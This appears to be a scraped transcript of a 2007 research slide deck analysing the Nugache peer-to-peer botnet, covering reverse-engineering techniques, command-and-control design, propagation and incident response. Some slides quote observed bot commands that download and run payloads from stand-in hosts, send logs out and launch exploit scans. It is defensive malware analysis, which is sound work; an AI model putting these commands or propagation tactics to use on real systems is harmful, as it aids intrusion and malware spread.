Presentation is loading. Please wait.

Presentation is loading. Please wait.

Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved David Dittrich University of Washington Bruce Dang Microsoft Corporation Understanding.

Published byJasmin Garrison Modified over 8 years ago

Similar presentations

Presentation on theme: "Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved David Dittrich University of Washington Bruce Dang Microsoft Corporation Understanding."— Presentation transcript:

1 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved David Dittrich University of Washington Bruce Dang Microsoft Corporation Understanding Emerging Threats: The case of Nugache

2 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Outline Practical Techniques for Reverse Engineering Comparison of Distributed Intruder Tools Networks & Evolution of features/tactics Nugache - New P2P malware Response Implications Conclusions

3 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Practical techniques Packing, unpacking, identifying crypto, and patching (applied to Nugache)

4 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Agenda Packing Generic unpacking techniques Recognizing “important” functions Identifying cryptographic mechanisms (with and without scripts). Patching and dynamic analysis

5 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Packing strings(1) does not work well Hinders static analysis Dynamic analysis is a bit harder  Anti-debugging mechanisms (that you have not identified)  Cannot set breakpoints wisely Creates anger

6 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Generic unpacking methods The packed regions must be loaded, decrypted or decompressed, and executed.  (most of the time) Implies mov reg, [mem], loop, jmp / call reg/mem (read, unpack loop, write, execute) Identify where these operations are happening. (1) You can be lazy and just look for jmp/call reg, jmp/call [reg], jmp imm (2) Memory breakpoints on write/execute regions. (3) “guess” what library calls might be made and set a global breakpoint there (i.e., socket(), gethostbyname(), connect(), etc.) (4) One instruction at a time …

7 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Recognizing “important” functions Familiarize yourself with common call chains and function relationship: socket, gethostbyname, connect, send, recv, close; CreateFile, ReadFile, WriteFile, CloseHandle, … Example: functions where send/recv occurs are typically dealing with network data; hence, they will be processing important buffers. Give friendly names and use cross-reference to your advantage. If they use encryption, they will need to encrypt the buffer before passing it to send; hence, trace backwards to where it was created and give it a friendly name “XXX_encrypt_buffer.” The same applies for recv Use cross-reference on strings because they usually give important clues about the function itself. “NICK %s” + “JOIN %s” -> probably IRC handler. “200 Command okay” + “212 Directory status” -> probably FTP handler. Identify a KNOWN function, then use cross-reference to trace backwards and give it a meaningful name.

8 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Code is usually written by humans so you can understand it too …

9 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Identifying cryptographic mechanisms WITH scripts  findcrypt (IDA and OllyDBG)  Krypto Kanal (PEID) WITHOUT scripts  (symmetric) Identify S-box values (a huge array of integers section). Use cross-reference on the array and give it a friendly name. Repeat until it makes sense. Matrix operations. Setkey - > encrypt  (asymmetric) Identify common public exponents (65535, 31337) and big integer multiplication.  (hash) HUGE functions which only consist of mov and arithmetic instructions. Think of common call chains: MD5Init - > MD5Update -> MD5Final. I wrote an IDA script to do this.  PRNG – no generic way.. Identify common seeders, GetTickCount(), GetCursorPos(), routines with lower/upper bounds arguments, time(NULL), XREFs against functions that you suspect to use PRNG (i.e., random email/contact, …)

10 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved

11

12

13 Patching and dynamic analysis Identify the important routines you want to patch. Good targets are ones that do the encryption/decryption. There are several ways you can to do it. Easiest patching method: write your logging function in a padding zone, carve out 5 bytes for a long JMP to the padding zone, JMP back and resume execution.

14 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved To Sum Up Reverse engineering is non-trivial, but is a critical skill for agile response Static and dynamic analysis techniques complement each other (especially with C++) RE is under-appreciated as a Software Engineering discipline What can you learn from RE? (we move on…)

15 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Comparison of Distributed Intruder Tool Networks Command and control (C2) Structures for Distributed Malware Code reuse/feature convergence Tactical convergence and advances in attack methodologies

16 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Command & Control (C2) Structures Handler/Agent IRC Botnet Peer to Peer Command and control structures in malware: From Handler/Agent to P2P, by Dave Dittrich and Sven Dietrich, USENIX ;login: vol. 32, no. 6, December 2007, pp. 8-17

17 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Propagation mechanisms 1. Exploitation of remotely accessible vulnerabilities in the Windows LSASS (139/tcp) and RPC-DCOM (445/tcp) services 2. Email to targets obtained from WAB except those containing specific substrings (e.g., “icrosof”, “buse”, “secur”, “dmin”, “.gov”, “.mil”, etc.) 3. Messaging AIM and MSN buddy list members with randomly formed sentence and URL 4. Trojan Horse dropper associated with “celebrity video clips” 5. Trojan Horse SETUP.EXE on free download site Social Engineering Technical Exploits

18 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Nugache P2P bot Features Analysis and Observations  April 30, 2006 through today  pcap (full packet), p0f, Snort  Collection using Honeynet Project’s Honeywall (versions roo-1.0.194 and roo-1.1-RC-2)

19 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Features Successful P2P C&C  Original on 8/tcp (now on random high-numbered ports)  All C2 over P2P channel (including updates)  Advanced use of crypto RSA key exchange Rijndael-256-OFB (w/per-session symmetric keys) Signed commands and binary (4096 bit key) Feature-rich, OO shell command set Exposes only a limited subset of peers to traffic analysis

20 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Feature Comparison StormNugache Primary C2“Pull” from C2 serversP2P Initial Peer List SeedingText fileBuilt-in, or pre-loaded into Registry (HKCU) Use of Crypto for C2 CommsMD4 hash to conceal file names, 320bit shared key 512-1024bit RSA key exchange, Rijndael-256- OFB session keys Use of DNS in C2None/ ”Fast Flux” to hide C2 servers None ConnectivityHundreds~1 dozen UpdatesBy command (not at all?)Automatic Listening portRandom high-numbered ArchitectureMultipartiteMonolithic DetectionVisible on host; eDonkey traffic detectable by signature Visible on host; P2P traffic not easily detected by signature Analysis of the Storm and Nugache Trojans: P2P is here, Sam Stover, Dave Dittrich, John Hernandez, and Sven Dietrich, USENIX ;login: vol. 32, no. 6, December 2007, pp. 18-27

21 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Analysis and Observations AV Network traffic analysis Propagation and DDoS activity

22 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved AV Scan Results (Dec. 2006)

23 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Unique IP Addresses Seen

24 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Seven Days in the Life…

25 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Example of use (from IRC) 2006/05/19 01:04 GMT #ch4nn3l :scan:exploit,lsass #ch4nn3l :scan:payload,HTTPEXEC,http://www.[……..].com/files/a.exe #ch4nn3l :scan:start,3000 #ch4nn3l :scan:target,add,192.168.0.* #ch4nn3l :scan:target,add,192.168.1.* #ch4nn3l :scan:target,add,192.168.100.* #ch4nn3l :scan:target,add,R5000 #ch4nn3l :scan:target,current #ch4nn3l :spaim:10 Replies: :LSASS Operating system (192.168.1.121) is WinXP [213 times] :Sent execute to AIM_USER_NICK [103 times]

26 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved IRC Bots vs. 8/tcp Peers SetTime to Observe at2as.bots34 mins. l2k.bots2 mins. port8.peers48 days

27 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Propagation Events

28 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Social Engineered Trojan Dropper Attack

29 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Indirect Propagation

30 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Download site (Counts from Site 2, not site shown here.)

31 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Features C&C comms heavily encrypted “1 ”

32 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Command Examples Discrete commands AIM.Spread(10); Scripts.AbortAll(); Looping while(1){ HTTP.Visit("http://www.example.com/target.php", 0); } Logical operations if(Rand(0,99)==0){ Sleep(Rand(0, 16000000)); Logs.Send("10.0.0.1", 80); } if(!PVAR.IsSet("mail")){ HTTP.Execute("http://bogus-site.com/addressgrabber.exe"); PVAR.Set("mail", 1); } Command sequences Scan.Targets.Clear(); Scan.SetPayload("HTTPEXEC", "http://bogus-site.com/pwn.php"); Scan.SetExploit("asn1smbnt"); Scan.Targets.Add("R99999999"); Scan.Start(20000); [some time later…] Scan.Pause(); [some time later…] Scan.Start(); [some time later…] Scan.Stop();

33 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Encryption/Signing of Commands Command block 10|3|22|AIM.Spread(10);|583E37091E7B8B7AFD8662485EFE7BF08DA3ACB63F611D46A329DD1CF86DB42A7FCD6616F2CAAEA728701FA8B71C782FAA48911D BF069E0091D914415320DD8624CFA982D23761C082BC88C037621473B3E518E6DD8C2E659E1A02EF2DA63C86C78853EF7868A3B92E4F7F8FB7DFB8BD9AF 9F7ACB1A3AE7761A4E008B070B02793965FB4F1DBFA447FD871058F4893511BECAB27AB81B532B6143159EAB065798220A46864B0927E0A8D6F8C7C6D0FA 396D23C33010F61054381531D5D166A4F08517064A2EECBA2A7671E35257247CB2D7F07DFBC6ADC3C7A3D2EB9DAEB29DAE79B9157657A70620DFF4CA7E8 27598EEF9D3CDC2B191DF6A2C0B1D33F95228C368BD2BE2A7E59D3223B898EA975C991057BEE002B9DA34A97F697F12832B7CBFEB786B438092FEEA362A 10EC9E19602DD9D3F557014DC06DDD34EE5FD14C2D7DB16D9BE05E31DA862341F92464761443DE1E4865A867E5179998C386115890DBDDE3FF61B3E34B1 84C20B7B3155DF4D6C6C973B36FBAEC7A6A5D82A0C7C89ACB41BFB60497A3D3578701DEC096580098B756F9633D019109430E3804E127B4C924AAB019717 1AB554642ED2E7B04019C70C5DF26BC4D2CA18C30AC990EBAFAA302C91F998C5556D513448FA357AA036A08B9F43A9A2A5EE1C2301F68A70BA8431ED808 190D1AABCDE180F58E4DB13C17FECF47B8131304F96EA337E64FC5A|D027C867 Signature block decrypted with embedded 4096-bit public key 01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF FFFFFFFFFFFF00B55A34436A2A6AD7DA837A21BA58E5CC Validation $ echo -n "AIM.Spread(10);D027C8673" | md5sum b55a34436a2a6ad7da837a21ba58e5cc -

34 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Enumeration Experiments Queried all reachable bots for:  Connected peers (clients)  Known peers  Version, etc. 90 samples 160 hosts always up and reachable

35 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Distribution of Bots by Country

36 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Enumeration Experiment #3

37 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Patch Tuesday Effect

38 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Comparison w/Storm Source: Thorsten Holtz’ “Honeyblog” http://honeyblog.org/uploads/stuff/storm/storm-growth.png Source: Brandon Enright http://noh.ucsd.edu/~bmenrigh/exposing_storm.ppt

39 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Actual structure? Rotavirus http://web.uct.ac.za/depts/mmi/stannard/rota.html

40 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Sub-graph (Degree 9+)

41 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Sub-graph (Degree 10)

42 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Comparison with Gnutella Source: “Visualizing Large and Dynamic Communication Networks,” http://www.nikolaus-kuehn.de/downloads/TelecoNetworkVisualization.pdf

43 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Response Implications Decreased visibility => More survivability Harder to stop, harder to trace back Expertise needed to infiltrate new botnets Cooperative, collaborative, and optimized response needed

44 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Operations Considerations DDoS victims: Collect all source IPs (and whatever else you can collect) Sites w/attack peers: Collect full packet data ASAP  Honeywall useful at LAN level to collect data, minimize potential for harm Ensure log times are complete and accurate Record IP  DNS mappings (and time!) Put data collection at equal priority with takedown

45 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Conclusions Response is about to get a LOT harder C&C less important; identifying peer connections more important Experts (w/reverse engineers) must be engaged early Collaborative/cooperative response will become essential (lots of opportunities to optimize) There is much research left to do…

46 Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved Thanks and questions Help from: Sven Dietrich (Stevens Institute of Technology), John Hernandez (UW Tacoma), Sam Stover (iSIGHT Partners), “others” Contacts: Bruce Dang Microsoft bda(at)microsoft.com Dave Dittrich University of Washington dittrich(at)u.washington.edu http://staff.washington.edu/dittrich/ http://vig.prenhall.com/catalog/academic/product/0,1144,0131475738,00.html

Download ppt "Copyright © 2007 David Dittrich, Bruce Dang All Rights Reserved David Dittrich University of Washington Bruce Dang Microsoft Corporation Understanding."

Similar presentations

A Survey of Botnet Size Measurement PRESENTED: KAI-HSIANG YANG ( 楊凱翔 ) DATE: 2013/11/04 1/24.

A Survey of Botnet Size Measurement PRESENTED: KAI-HSIANG YANG ( 楊凱翔 ) DATE: 2013/11/04 1/24.
1© Copyright 2011 EMC Corporation. All rights reserved. Anatomy of an Attack.

1© Copyright 2011 EMC Corporation. All rights reserved. Anatomy of an Attack.
Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.

Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
1© Copyright 2011 EMC Corporation. All rights reserved. Advanced Persistent Threat Sachin Deshmanya & Srinivas Matta.

1© Copyright 2011 EMC Corporation. All rights reserved. Advanced Persistent Threat Sachin Deshmanya & Srinivas Matta.
Simulation and Analysis of DDos Attacks Poongothai, M Department of Information Technology,Institute of Road and Transport Technology, Erode Tamilnadu,

Simulation and Analysis of DDos Attacks Poongothai, M Department of Information Technology,Institute of Road and Transport Technology, Erode Tamilnadu,
BotMiner Guofei Gu, Roberto Perdisci, Junjie Zhang, and Wenke Lee College of Computing, Georgia Institute of Technology.

BotMiner Guofei Gu, Roberto Perdisci, Junjie Zhang, and Wenke Lee College of Computing, Georgia Institute of Technology.
User studies. Why user studies? How do we know security and privacy solutions are really usable? Have to observe users! –you may be surprised by what.

User studies. Why user studies? How do we know security and privacy solutions are really usable? Have to observe users! –you may be surprised by what.
Review for Exam 4 School of Business Eastern Illinois University © Abdou Illia, Fall 2006.

Review for Exam 4 School of Business Eastern Illinois University © Abdou Illia, Fall 2006.
Domain Name System: DNS

Domain Name System: DNS
Investigations into BIND Dynamic Update with OpenSSL by David Wilkinson.

Investigations into BIND Dynamic Update with OpenSSL by David Wilkinson.
Threat infrastructure: proxies, botnets, fast-flux

Threat infrastructure: proxies, botnets, fast-flux
TCP/IP Protocol Suite 1 Copyright © The McGraw-Hill Companies, Inc. Permission required for reproduction or display. Chapter 19 Domain Name System (DNS)

TCP/IP Protocol Suite 1 Copyright © The McGraw-Hill Companies, Inc. Permission required for reproduction or display. Chapter 19 Domain Name System (DNS)
How to Own the Internet in your spare time Ashish Gupta Network Security April 2004.

How to Own the Internet in your spare time Ashish Gupta Network Security April 2004.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.
BOTNETS & TARGETED MALWARE Fernando Uribe. INTRODUCTION  Fernando Uribe   IT trainer and Consultant for over 15 years specializing.

BOTNETS & TARGETED MALWARE Fernando Uribe. INTRODUCTION  Fernando Uribe   IT trainer and Consultant for over 15 years specializing.
Client-Server collaborative scanning Dumitru Codreanu R&D, BitDefender.

Client-Server collaborative scanning Dumitru Codreanu R&D, BitDefender.
KaZaA: Behind the Scenes Shreeram Sahasrabudhe Lehigh University

KaZaA: Behind the Scenes Shreeram Sahasrabudhe Lehigh University
1 Measurements and Mitigation of Peer-to-Peer-based Botnets: A Case Study on Storm Worm T. Holz, M. Steiner, F. Dahl, E. Biersack, and F. Freiling - Proceedings.

1 Measurements and Mitigation of Peer-to-Peer-based Botnets: A Case Study on Storm Worm T. Holz, M. Steiner, F. Dahl, E. Biersack, and F. Freiling - Proceedings.
China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC.

China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC.

Similar presentations

Ads by Google